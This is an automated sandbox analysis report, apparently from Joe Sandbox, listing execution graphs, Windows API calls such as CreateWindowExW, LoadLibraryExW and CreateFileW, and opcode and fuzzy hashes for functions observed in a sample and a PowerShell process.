                                                                                                            execution_graph 11173 17654f0 DuplicateHandle 11174 1765586 11173->11174 11175 176e7b8 11176 176e820 CreateWindowExW 11175->11176 11178 176e8dc 11176->11178 11179 17652c8 11180 17652c9 GetCurrentProcess 11179->11180 11181 1765342 GetCurrentThread 11180->11181 11184 176533b 11180->11184 11182 176537f GetCurrentProcess 11181->11182 11185 1765378 11181->11185 11183 17653b5 11182->11183 11186 17653dd GetCurrentThreadId 11183->11186 11184->11181 11185->11182 11187 176540e 11186->11187 11188 1765b08 11189 1765b36 11188->11189 11192 1765004 11189->11192 11191 1765b56 11193 176500f 11192->11193 11194 176625e 11193->11194 11197 1767982 11193->11197 11203 1767990 11193->11203 11194->11191 11198 17679b1 11197->11198 11199 17679d5 11198->11199 11209 1767b40 11198->11209 11213 1767b98 11198->11213 11220 1767b30 11198->11220 11199->11194 11204 17679b1 11203->11204 11205 17679d5 11204->11205 11206 1767b40 3 API calls 11204->11206 11207 1767b30 3 API calls 11204->11207 11208 1767b98 3 API calls 11204->11208 11205->11194 11206->11205 11207->11205 11208->11205 11210 1767b4d 11209->11210 11212 1767b86 11210->11212 11224 1766e80 11210->11224 11212->11199 11215 1767b9b 11213->11215 11217 1767b4b 11213->11217 11214 1767bf8 11214->11214 11215->11214 11218 1766eb4 3 API calls 11215->11218 11216 1767b86 11216->11199 11217->11216 11219 1766e80 3 API calls 11217->11219 11218->11214 11219->11216 11221 1767b40 11220->11221 11222 1767b86 11221->11222 11223 1766e80 3 API calls 11221->11223 11222->11199 11223->11222 11225 1766e8b 11224->11225 11227 1767bf8 11225->11227 11228 1766eb4 11225->11228 11229 1766ebf 11228->11229 11235 1766ec4 11229->11235 11231 1767ca0 11231->11227 11234 1767c67 11241 176c440 11234->11241 11248 176c428 11234->11248 11236 1766ecf 11235->11236 11254 1767248 11236->11254 11238 1768174 11239 176839c 11238->11239 11240 1767990 3 API calls 11238->11240 11239->11234 11240->11239 11243 176c4bd 11241->11243 11244 176c471 11241->11244 11242 176c47d 11242->11231 11243->11231 11244->11242 11262 176c6ea 11244->11262 11272 176c698 11244->11272 11276 176c6a8 11244->11276 11249 176c43d 11248->11249 11250 176c47d 11249->11250 11251 176c6ea 2 API calls 11249->11251 11252 176c6a8 2 API calls 11249->11252 11253 176c698 2 API calls 11249->11253 11250->11231 11251->11250 11252->11250 11253->11250 11255 1767253 11254->11255 11256 176952a 11255->11256 11258 176957a 11255->11258 11256->11238 11259 17695cb 11258->11259 11260 17695d6 KiUserCallbackDispatcher 11259->11260 11261 1769600 11259->11261 11260->11261 11261->11256 11263 176c699 11262->11263 11264 176c6f2 11262->11264 11269 176c6ea LoadLibraryExW 11263->11269 11265 176c6b2 11264->11265 11279 176c971 11264->11279 11283 176c980 11264->11283 11265->11243 11266 176c71b 11266->11265 11267 176c920 GetModuleHandleW 11266->11267 11268 176c94d 11267->11268 11268->11243 11269->11265 11273 176c69d 11272->11273 11274 176c6b2 11273->11274 11275 176c6ea 2 API calls 11273->11275 11274->11243 11275->11274 11277 176c6b2 11276->11277 11278 176c6ea 2 API calls 11276->11278 11277->11243 11278->11277 11280 176c994 11279->11280 11281 176c9b9 11280->11281 11287 176bc08 11280->11287 11281->11266 11284 176c994 11283->11284 11285 176c9b9 11284->11285 11286 176bc08 LoadLibraryExW 11284->11286 11285->11266 11286->11285 11288 176cb60 LoadLibraryExW 11287->11288 11290 176cbd9 11288->11290 11290->11281

                                                                                                            Executed Functions

                                                                                                            Function 01765287 Relevance: 6.1, APIs: 4, Instructions: 144threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 01765328
                                                                                                            • GetCurrentThread.KERNEL32 ref: 01765365
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 017653A2
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 017653FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 6eab50c0bc1ef9269785b83b0ec90444d41deb8bc0f39f8ed6ff3c55872249e9
                                                                                                            • Instruction ID: 9b1f98a642d4dec6983f9f6d7d4c01fe9cfa5de2e2a81069333028bc05adabfd
                                                                                                            • Opcode Fuzzy Hash: 6eab50c0bc1ef9269785b83b0ec90444d41deb8bc0f39f8ed6ff3c55872249e9
                                                                                                            • Instruction Fuzzy Hash: 7E5188B09043498FDB14CFA9C5887EEFFF4EF49318F24846AE409A7260D7749844CB69
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 017652C8 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 01765328
                                                                                                            • GetCurrentThread.KERNEL32 ref: 01765365
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 017653A2
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 017653FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: d304bf4ca70f92b5040122731ea7045250abccb48b1b5887d05ed00229886151
                                                                                                            • Instruction ID: b703935fd050e19d0f715b30683016d5ca22a6bb2bccfcf333b6ea332ce10109
                                                                                                            • Opcode Fuzzy Hash: d304bf4ca70f92b5040122731ea7045250abccb48b1b5887d05ed00229886151
                                                                                                            • Instruction Fuzzy Hash: 2E5124B09043498FDB14CFAAD9487EEBBF4EF48318F24845AE809A7350D7749944CF69
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0176C6EA Relevance: 1.7, APIs: 1, Instructions: 228COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 167 176c6ea-176c6f0 168 176c6f2-176c6f4 167->168 169 176c699-176c6ac call 176c6ea 167->169 170 176c6f6 168->170 171 176c6c5-176c6d9 168->171 172 176c6b2-176c6bd 169->172 173 176c6f8 170->173 174 176c6f9-176c70d call 176bbc4 170->174 179 176c6dc-176c6e0 171->179 172->179 182 176c6bf-176c6c4 172->182 173->174 180 176c723-176c727 174->180 181 176c70f 174->181 183 176c73b-176c77c 180->183 184 176c729-176c733 180->184 234 176c715 call 176c980 181->234 235 176c715 call 176c971 181->235 182->171 189 176c77e-176c786 183->189 190 176c789-176c797 183->190 184->183 185 176c71b-176c71d 185->180 186 176c858-176c918 185->186 226 176c920-176c94b GetModuleHandleW 186->226 227 176c91a-176c91d 186->227 189->190 192 176c7bb-176c7bd 190->192 193 176c799-176c79e 190->193 196 176c7c0-176c7c7 192->196 194 176c7a0-176c7a7 call 176bbd0 193->194 195 176c7a9 193->195 198 176c7ab-176c7b9 194->198 195->198 199 176c7d4-176c7db 196->199 200 176c7c9-176c7d1 196->200 198->196 203 176c7dd-176c7e5 199->203 204 176c7e8-176c7f1 call 1765f18 199->204 200->199 203->204 209 176c7f3-176c7fb 204->209 210 176c7fe-176c803 204->210 209->210 211 176c805-176c80c 210->211 212 176c821-176c825 210->212 211->212 213 176c80e-176c81e call 176a538 call 176bbe0 211->213 231 176c828 call 176cc60 212->231 232 176c828 call 176cc50 212->232 213->212 216 176c82b-176c82e 219 176c830-176c84e 216->219 220 176c851-176c857 216->220 219->220 228 176c954-176c968 226->228 229 176c94d-176c953 226->229 227->226 229->228 231->216 232->216 234->185 235->185
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5e512a28440c1b6509a121b5ad17acb3f4e2be16b13bee9c4a9e49dd71b18d0a
                                                                                                            • Instruction ID: 15100cdf95d675e09f119cde31c2af49cd6205445ac333620335f80263bcb5e3
                                                                                                            • Opcode Fuzzy Hash: 5e512a28440c1b6509a121b5ad17acb3f4e2be16b13bee9c4a9e49dd71b18d0a
                                                                                                            • Instruction Fuzzy Hash: 55917670A00B058FD725CF69D54479ABBF5FF88214F04892ED98ADBA50DB38E806CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0176E7AD Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 236 176e7ad-176e81e 238 176e820-176e826 236->238 239 176e829-176e830 236->239 238->239 240 176e832-176e838 239->240 241 176e83b-176e873 239->241 240->241 242 176e87b-176e8da CreateWindowExW 241->242 243 176e8e3-176e91b 242->243 244 176e8dc-176e8e2 242->244 248 176e91d-176e920 243->248 249 176e928 243->249 244->243 248->249 250 176e929 249->250 250->250
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0176E8CA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 23636050a7d7b28e149bb3517cc0cf2d0c43aebef4798e35e8e23abac0b3f80a
                                                                                                            • Instruction ID: ac668c5fa7bff3f74fee2ba342ef1a93d6e9b0798b3ca3356e1c9c5dd494e49c
                                                                                                            • Opcode Fuzzy Hash: 23636050a7d7b28e149bb3517cc0cf2d0c43aebef4798e35e8e23abac0b3f80a
                                                                                                            • Instruction Fuzzy Hash: 3551CFB5D00349DFDB14CF99C884ADEFBB5BF88314F25812AE819AB210DB749945CF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0176E7B8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 251 176e7b8-176e81e 252 176e820-176e826 251->252 253 176e829-176e830 251->253 252->253 254 176e832-176e838 253->254 255 176e83b-176e8da CreateWindowExW 253->255 254->255 257 176e8e3-176e91b 255->257 258 176e8dc-176e8e2 255->258 262 176e91d-176e920 257->262 263 176e928 257->263 258->257 262->263 264 176e929 263->264 264->264
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0176E8CA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 9707fa013a72f310f35f38b1b9319257a228f95652852e728459fb5333192d44
                                                                                                            • Instruction ID: 89880f6edb452e6661892b114e429a3dbfecbca37dd5947158e4077a3f88fcac
                                                                                                            • Opcode Fuzzy Hash: 9707fa013a72f310f35f38b1b9319257a228f95652852e728459fb5333192d44
                                                                                                            • Instruction Fuzzy Hash: 1D41AEB5D00349DFDB14CF99C884ADEFBB5BF88314F24812AE819AB210D7749945CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 017654E8 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 265 17654e8-1765584 DuplicateHandle 266 1765586-176558c 265->266 267 176558d-17655aa 265->267 266->267
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01765577
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 5c15bc55e387dd83f63be3d98e90f1bd073679bb4a9f7690c2706151dfd5c04c
                                                                                                            • Instruction ID: 4b5db6e698d0728e4dc9c6c29bda2fbdded6aaff4436fda82717a78448adbfc5
                                                                                                            • Opcode Fuzzy Hash: 5c15bc55e387dd83f63be3d98e90f1bd073679bb4a9f7690c2706151dfd5c04c
                                                                                                            • Instruction Fuzzy Hash: 502112B5D00249DFDB10CFA9D984ADEBBF9EB48324F24841AE918B7310D374A945DF61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 017654F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 270 17654f0-1765584 DuplicateHandle 271 1765586-176558c 270->271 272 176558d-17655aa 270->272 271->272
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01765577
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: e1622473926fc36f2cb34644f0ac909e42648e154a903077da95a97e7cb1f907
                                                                                                            • Instruction ID: d6e9c71b511679b034df0cb370eb605ff507b77c9ad2804d5d23abe419b12130
                                                                                                            • Opcode Fuzzy Hash: e1622473926fc36f2cb34644f0ac909e42648e154a903077da95a97e7cb1f907
                                                                                                            • Instruction Fuzzy Hash: 8421E2B5900248DFDB10CFAAD984ADEFBF9EB48324F14801AE958A3310D374A954CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0176BC08 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 275 176bc08-176cba0 277 176cba2-176cba5 275->277 278 176cba8-176cbd7 LoadLibraryExW 275->278 277->278 279 176cbe0-176cbfd 278->279 280 176cbd9-176cbdf 278->280 280->279
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0176C9B9,00000800,00000000,00000000), ref: 0176CBCA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: fee0e88fce875641243b14f306f9982d8c09f648fcb7e89704832910ab536543
                                                                                                            • Instruction ID: 06fb7233b55f15800eca28fb29a9421a8f73679936299fc06f62075976f4802f
                                                                                                            • Opcode Fuzzy Hash: fee0e88fce875641243b14f306f9982d8c09f648fcb7e89704832910ab536543
                                                                                                            • Instruction Fuzzy Hash: 6E1114B69042498FDB10CF9AD444BDEFBF8EB88324F14842AE959B7600C374A945CFA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0176CB59 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 283 176cb59-176cba0 285 176cba2-176cba5 283->285 286 176cba8-176cbd7 LoadLibraryExW 283->286 285->286 287 176cbe0-176cbfd 286->287 288 176cbd9-176cbdf 286->288 288->287
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0176C9B9,00000800,00000000,00000000), ref: 0176CBCA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: a651aee0c3fcb586b95002dd7138e560ccea53da2c12e371122e3b193b17e971
                                                                                                            • Instruction ID: d3c60f2da6679f69c3c0636d141db1fb8662fbfa92c345d345c26f5368f7288b
                                                                                                            • Opcode Fuzzy Hash: a651aee0c3fcb586b95002dd7138e560ccea53da2c12e371122e3b193b17e971
                                                                                                            • Instruction Fuzzy Hash: 861114B68002498FDB10CF9AD844BDEFBF8EB88324F04842AE959B7600C375A545CFA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0176957A Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 291 176957a-17695d4 293 17695d6-17695fe KiUserCallbackDispatcher 291->293 294 1769622-176963b 291->294 295 1769607-176961b 293->295 296 1769600-1769606 293->296 295->294 296->295
                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 017695ED
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2492992576-0
                                                                                                            • Opcode ID: d86a02d7adc40a5cf957984aed6f89316bad162303965dc0ee30f31059b222f9
                                                                                                            • Instruction ID: 1f0a08d0a856429c705f83fa5aed4feb4e463553750d838f70d2cf662b0f7117
                                                                                                            • Opcode Fuzzy Hash: d86a02d7adc40a5cf957984aed6f89316bad162303965dc0ee30f31059b222f9
                                                                                                            • Instruction Fuzzy Hash: 0311B1B5844395CFDB12CFA9C5043DEBFF4AB05324F14845AC585B3682C3789605CFA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0176C8D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 298 176c8d8-176c918 299 176c920-176c94b GetModuleHandleW 298->299 300 176c91a-176c91d 298->300 301 176c954-176c968 299->301 302 176c94d-176c953 299->302 300->299 302->301
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0176C93E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: b39dfc1dff775ab6dc2824fddea20f998fdfbbf77fb858ac533e472c241d4387
                                                                                                            • Instruction ID: a9435645c0939e07974124ce6d055d54ef72f31ccaef2ee748b5fb44dd364675
                                                                                                            • Opcode Fuzzy Hash: b39dfc1dff775ab6dc2824fddea20f998fdfbbf77fb858ac533e472c241d4387
                                                                                                            • Instruction Fuzzy Hash: 2011D2B5C003498FDB10CF9AD444BDEFBF8AB88224F15841AD999A7600D374A545CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 0176CDE0 Relevance: .5, Instructions: 522COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3e7a0f73e56cd9d9a5fdaca466c4c8d8c347384688198856be41b52736ee8932
                                                                                                            • Instruction ID: bd2c73687126141fa75aaff359458a5b5c37e24addf0140f366310618c8d1cf5
                                                                                                            • Opcode Fuzzy Hash: 3e7a0f73e56cd9d9a5fdaca466c4c8d8c347384688198856be41b52736ee8932
                                                                                                            • Instruction Fuzzy Hash: B55258B1580706CFD720CF54E8C859DBFB1FB45338FA08209D5A16BA99D3B4664ACF85
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0176A5A8 Relevance: .3, Instructions: 265COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ee9dd90c4c66f2566d7071fa0c554f0f26e204d65c7a4c2398a6b89a935edea1
                                                                                                            • Instruction ID: fd0e0b461fdc88eed45a8176b29ef1fe35fc8fb36e43b74ff2a86be35a9b00b1
                                                                                                            • Opcode Fuzzy Hash: ee9dd90c4c66f2566d7071fa0c554f0f26e204d65c7a4c2398a6b89a935edea1
                                                                                                            • Instruction Fuzzy Hash: 0AA15D32E0021A8FCF15DFA5C8845DEFBB6FF85300B15856AE905BB225EB35A945CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:4.2%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:23
                                                                                                            Total number of Limit Nodes:4
                                                                                                            execution_graph 23559 49302a8 23560 49302c0 23559->23560 23561 49302d5 23560->23561 23566 4931240 23560->23566 23570 4930f48 23560->23570 23575 49312e4 23560->23575 23562 4930306 23567 4931244 GetFileAttributesW 23566->23567 23569 49312bf 23567->23569 23569->23562 23571 4930f58 23570->23571 23572 49312a2 GetFileAttributesW 23571->23572 23574 4931026 23571->23574 23573 49312bf 23572->23573 23573->23562 23574->23562 23576 49312a2 GetFileAttributesW 23575->23576 23577 49312f2 23575->23577 23578 49312bf 23576->23578 23578->23562 23579 493ace8 23585 493a644 23579->23585 23581 493ad1d 23583 493ade4 CreateFileW 23584 493ae21 23583->23584 23586 493ad90 CreateFileW 23585->23586 23588 493ad07 23586->23588 23588->23581 23588->23583

                                                                                                            Executed Functions

                                                                                                            Function 04930F48 Relevance: 1.8, APIs: 1, Instructions: 273COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 4930f48-4930f56 1 4930f58-4930f5b 0->1 2 4930f5c-4930f86 0->2 1->2 5 4930f94 2->5 6 4930f88-4930f92 2->6 7 4930f99-4930f9b 5->7 6->7 8 4930fa1-4930fa5 7->8 9 4931194-49311ab 7->9 10 4930fa7-4930fb4 8->10 11 4930fb6 8->11 15 49311b2-49311c9 9->15 13 4930fbb-4930fbd 10->13 11->13 14 4930fc3-4930fc7 13->14 13->15 16 4930fc9-4930fd6 14->16 17 4930fd8 14->17 21 49311d0-49311e7 15->21 20 4930fdd-4930fdf 16->20 17->20 20->21 22 4930fe5-4930fe9 20->22 29 49311ee-4931205 21->29 24 4930feb-4930ff8 22->24 25 4930ffa 22->25 26 4930fff-4931001 24->26 25->26 28 4931007-493100b 26->28 26->29 30 4931014-4931017 28->30 31 493100d-4931012 28->31 36 493120c-493123e 29->36 33 493101e-4931020 30->33 31->33 35 4931026-4931028 33->35 33->36 37 4931031-4931033 35->37 38 493102a-493102f 35->38 57 4931240-4931243 36->57 58 4931244-493128a 36->58 41 493103a-493103c 37->41 38->41 42 4931057-493105b 41->42 43 493103e-4931050 41->43 45 49310a5-49310a9 42->45 46 493105d-49310a2 42->46 43->42 47 49310f3-49310f7 45->47 48 49310ab-49310f0 45->48 46->45 52 4931102-4931106 47->52 53 49310f9-49310ff 47->53 48->47 54 4931111-4931191 52->54 55 4931108-493110e 52->55 53->52 55->54 57->58 63 4931292-49312bd GetFileAttributesW 58->63 64 493128c-493128f 58->64 69 49312c6-49312e3 63->69 70 49312bf-49312c5 63->70 64->63 70->69
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000000), ref: 049312B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.401755136.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4930000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 8300b26cf4d4e12fb574b4ed00e5963766a272facf03b1382e53a4b43f954e15
                                                                                                            • Instruction ID: 86454f09b533384e01f80933a9710d6f34630053087ecc389045c02f82373d59
                                                                                                            • Opcode Fuzzy Hash: 8300b26cf4d4e12fb574b4ed00e5963766a272facf03b1382e53a4b43f954e15
                                                                                                            • Instruction Fuzzy Hash: A7B1BF74A042098FCF10DF64C445BAEB7B5FF89309F018A39E5099B265DB78ED49CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0493ACE8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 86 493ace8-493ad1b call 493a644 90 493ad46-493addc 86->90 91 493ad1d-493ad45 86->91 99 493ade4-493ae1f CreateFileW 90->99 100 493adde-493ade1 90->100 101 493ae21-493ae27 99->101 102 493ae28-493ae45 99->102 100->99 101->102
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.401755136.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4930000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: b1c78424301ade0095e9967422ef23ebd145f30184791fa78a6f2e7e4efcd746
                                                                                                            • Instruction ID: 99f1dc6d0c3ce84be146a03734c45f4cf8d5677ee49e9246b25ee9b6e645bf57
                                                                                                            • Opcode Fuzzy Hash: b1c78424301ade0095e9967422ef23ebd145f30184791fa78a6f2e7e4efcd746
                                                                                                            • Instruction Fuzzy Hash: 3E41BEB1A042499FDB10CFA9D844B9EFFF5FB48314F15C16AE609AB281C774A940CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0493AD88 Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
